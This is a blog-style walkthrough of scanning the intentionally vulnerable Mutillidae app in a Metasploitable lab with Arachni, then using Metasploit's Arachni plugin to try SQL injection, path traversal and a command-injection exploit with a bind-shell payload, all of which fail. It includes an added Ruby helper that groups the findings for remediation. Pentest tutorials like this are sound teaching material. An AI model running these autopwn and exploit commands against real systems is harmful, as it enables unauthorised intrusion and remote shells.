WebApp exploitation with Arachni and Metasploit
Arachni is an open-source scanner whose efficiency and accuracy at finding web script vulnerabilities deserve praise. As a mainstream open-source scanner it naturally follows the trend and integrates well with Metasploit: through an msf plugin it plugs seamlessly into Metasploit.
Today we demonstrate using Arachni together with Metasploit to scan, assess and break into a website. My test environment is:
metasploitable + backbox + arachni + metasploit
First we scan the target host with Arachni. The output speaks for itself, so no lengthy explanation:
root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
       Author: Tasos "Zapotek" Laskos
               (With the support of the community and the Arachni Team.)
       Website:       http://arachni-scanner.com
       Documentation: http://arachni-scanner.com/wiki

 [~] No modules were specified.
 [~]  -> Will run all mods.
 [~] No audit options were specified.
 [~]  -> Will audit links, forms and cookies.
The scan saves its report in msf format (the metareport above) so that Metasploit can load it.
To bring the Arachni plugin into Metasploit, locate the Arachni directory and copy external/metasploit into Metasploit's root directory:
cp -R arachni/external/metasploit/* /opt/backbox/msf/
Then start Metasploit and load the Arachni plugin, as shown below:
root@metasploit:~# msfconsole
[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID  Exploit                   Description
--  -------                   -----------
1   auxiliary/arachni_sqlmap
Let's look at the options of Arachni's automatic attack command:
msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
    -h           Display this help text
    -x [regexp]  Only run modules whose name matches the regex
    -a           Launch exploits against all matched targets
    -r           Use a reverse connect shell
    -b           Use a bind shell on a random port (default)
    -m           Use a meterpreter shell (if possible)
    -q           Disable exploit module output
We choose to launch every matching exploit against all matched targets:
msf > arachni_autopwn -a
[*] Running pwn-jobs...
[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Started bind handler
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
Unfortunately, not a single one succeeded...
Next, let's see which vulnerabilities Arachni actually found, with the following command:
msf > arachni_list_vulns

Vulnerabilities
===============

ID  Host          Path                   Name                               Method  Params  Exploit
--  ----          ----                   ----                               ------  ------  -------
1   192.168.1.35  /mutillidae/index.php  SQL Injection  COOKIE  {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"}  auxiliary/arachni_sqlmap
2   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"}  auxiliary/arachni_sqlmap
3   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"}  auxiliary/arachni_sqlmap
4   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"}  auxiliary/arachni_sqlmap
5   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"}  auxiliary/arachni_sqlmap
6   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"}  auxiliary/arachni_sqlmap
7   192.168.1.35  /mutillidae/index.php  SQL Injection  COOKIE  {"showhints"=>"1XXinjectionXX"}  auxiliary/arachni_sqlmap
8   192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"}  auxiliary/arachni_sqlmap
9   192.168.1.35  /mutillidae/  SQL Injection  COOKIE  {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"}  auxiliary/arachni_sqlmap
10  192.168.1.35  /mutillidae/  SQL Injection  COOKIE  {"showhints"=>"1XXinjectionXX"}  auxiliary/arachni_sqlmap
11  192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"}  auxiliary/arachni_sqlmap
12  192.168.1.35  /mutillidae/index.php  SQL Injection  POST  {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"}  auxiliary/arachni_sqlmap
13  192.168.1.35  /mutillidae/index.php  SQL Injection  GET  {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"}  auxiliary/arachni_sqlmap
14  192.168.1.35  /mutillidae/index.php  SQL Injection  GET  {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"}  auxiliary/arachni_sqlmap
15  192.168.1.35  /mutillidae/index.php  SQL Injection  GET  {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"}  auxiliary/arachni_sqlmap
16  192.168.1.35  /mutillidae/index.php  SQL Injection  GET  {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"}  auxiliary/arachni_sqlmap
17  192.168.1.35  /mutillidae/index.php  Operating system command injection  POST  {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"}  unix/webapp/arachni_exec
18  192.168.1.35  /mutillidae/  Path Traversal  GET  {"page"=>"XXinjectionXX\x00.php"}  unix/webapp/arachni_path_traversal
19  192.168.1.35  /mutillidae/index.php  Path Traversal  GET  {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"}  unix/webapp/arachni_path_traversal
20  192.168.1.35  /mutillidae/index.php  Path Traversal  GET  {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"}  unix/webapp/arachni_path_traversal
21  192.168.1.35  /mutillidae/index.php  Path Traversal  POST  {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"}  unix/webapp/arachni_path_traversal
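Most of the 21 entries above are the same injection point reported with a different filler value (IDs 19 and 20, for instance, are both the page parameter of /mutillidae/index.php), so for remediation tracking it helps to collapse the listing onto distinct sinks before handing it to developers. The Ruby script below is an added example and is not code from the original post, from Arachni or from Metasploit. It parses rows in the layout printed by arachni_list_vulns, treats the parameter whose value carries the XXinjectionXX marker (the token that, per the module options later in the post, gets substituted with the payload) as the injected parameter, groups findings by host, path, method and parameter, and flags rows without any marker (like ID 6 above) for manual review. The sample rows are constructed from the listing above with some parameters omitted; the row regex and the assumption that the Params column is a Ruby-hash style literal are mine.

```ruby
# Triage helper for the table printed by Metasploit's arachni_list_vulns command.
# Added example for this post; not code from the original article, from Arachni
# or from Metasploit. Row layout and the XXinjectionXX token follow the listing
# in the post; the sample rows below are constructed from it.

INJECTION_MARKER = 'XXinjectionXX'

# One row per finding: ID Host Path Name Method Params Exploit (assumed layout).
ROW_RE = /\A(\d+)\s+(\S+)\s+(\S+)\s+(.+?)\s+(GET|POST|COOKIE|HEADER)\s+(\{.*\})\s+(\S+)\z/

# Constructed sample, modelled on rows from the post (same host and paths).
SAMPLE_ROWS = <<~'ROWS'
  1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
  5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "my_signature"=>"1"} auxiliary/arachni_sqlmap
  6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "my_signature"=>"1"} auxiliary/arachni_sqlmap
  9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
  17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
  18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
  19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
  20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer"} unix/webapp/arachni_path_traversal
ROWS

# Parse the Ruby-hash style Params column ({"k"=>"v", ...}) with a regex, never eval.
def parse_params(literal)
  literal.scan(/"((?:[^"\\]|\\.)*)"=>"((?:[^"\\]|\\.)*)"/).to_h
end

# Name of the parameter carrying the injection marker, or nil when the row
# marks none (such rows need a look at the full report).
def injection_point(params)
  pair = params.find { |_, v| v.include?(INJECTION_MARKER) }
  pair && pair.first
end

# One listing row -> Hash of its columns, or nil for lines that are not rows.
def parse_vuln_row(line)
  m = ROW_RE.match(line.strip) or return nil
  params = parse_params(m[6])
  { id: m[1].to_i, host: m[2], path: m[3], name: m[4], method: m[5],
    params: params, exploit: m[7], injection_point: injection_point(params) }
end

# Collapse findings onto distinct sinks: the same (host, path, method, parameter)
# reported with different filler values is one code location to fix, not several.
def triage(listing)
  sinks = Hash.new { |h, k| h[k] = { ids: [], names: [] } }
  unmarked = []
  listing.each_line do |line|
    row = parse_vuln_row(line) or next
    if row[:injection_point].nil?
      unmarked << row[:id]
      next
    end
    key = [row[:host], row[:path], row[:method], row[:injection_point]]
    sinks[key][:ids] << row[:id]
    sinks[key][:names] |= [row[:name]]
  end
  { sinks: sinks, unmarked: unmarked }
end

# Human-readable summary, one line per sink plus one for rows needing review.
def report(listing)
  result = triage(listing)
  lines = result[:sinks].map do |(host, path, method, param), info|
    "#{host}#{path} #{method} #{param}: #{info[:names].join('/')} (report IDs #{info[:ids].join(', ')})"
  end
  unless result[:unmarked].empty?
    lines << "no injection marker, review manually: IDs #{result[:unmarked].join(', ')}"
  end
  lines
end

puts report(SAMPLE_ROWS) if $PROGRAM_NAME == __FILE__
```

On the eight sample rows this yields six distinct sinks (IDs 19 and 20 merge onto the page parameter of /mutillidae/index.php) and one row flagged for review; the same grouping applied to the full 21-row listing is what a remediation ticket per sink should be based on.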
msf> arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST => 127.0.0.1
SRVPORT => 10401
RHOST => 192.168.1.35
RPORT => 80
LHOST => 127.0.0.1
LPORT => 5376
SSL => false
POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS
METHOD => POST
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH => /mutillidae/index.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) >
Check whether the configuration has any problems; if not, go ahead and run it:
msf exploit(arachni_exec) > show options

Module options (exploit/unix/webapp/arachni_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COOKIES                   no        Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   GET                       no        GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   HEADERS  Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c  no  Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   PATH     /mutillidae/index.php  yes  The path to the vulnerable script.
   POST     target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS  no  POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
   Proxies                   no        Use a proxy chain
   RHOST    192.168.1.35     yes       The target address
   RPORT    80               yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/bind_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  5376             yes       The listen port
   RHOST  192.168.1.35     no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic
It looks fine, so let's run it manually and see whether I've saved up enough luck lately.
-_-!!! No luck; both attempts failed:
msf exploit(arachni_exec) > exploit
[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) > exploit
[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) >
Today's test environment really didn't cooperate: not a single attempt succeeded. But this was only meant to show the process of using Arachni and Metasploit to assess and attack a web application. Just casual chatter; experts, feel free to skip it, and leave a comment if you have questions!!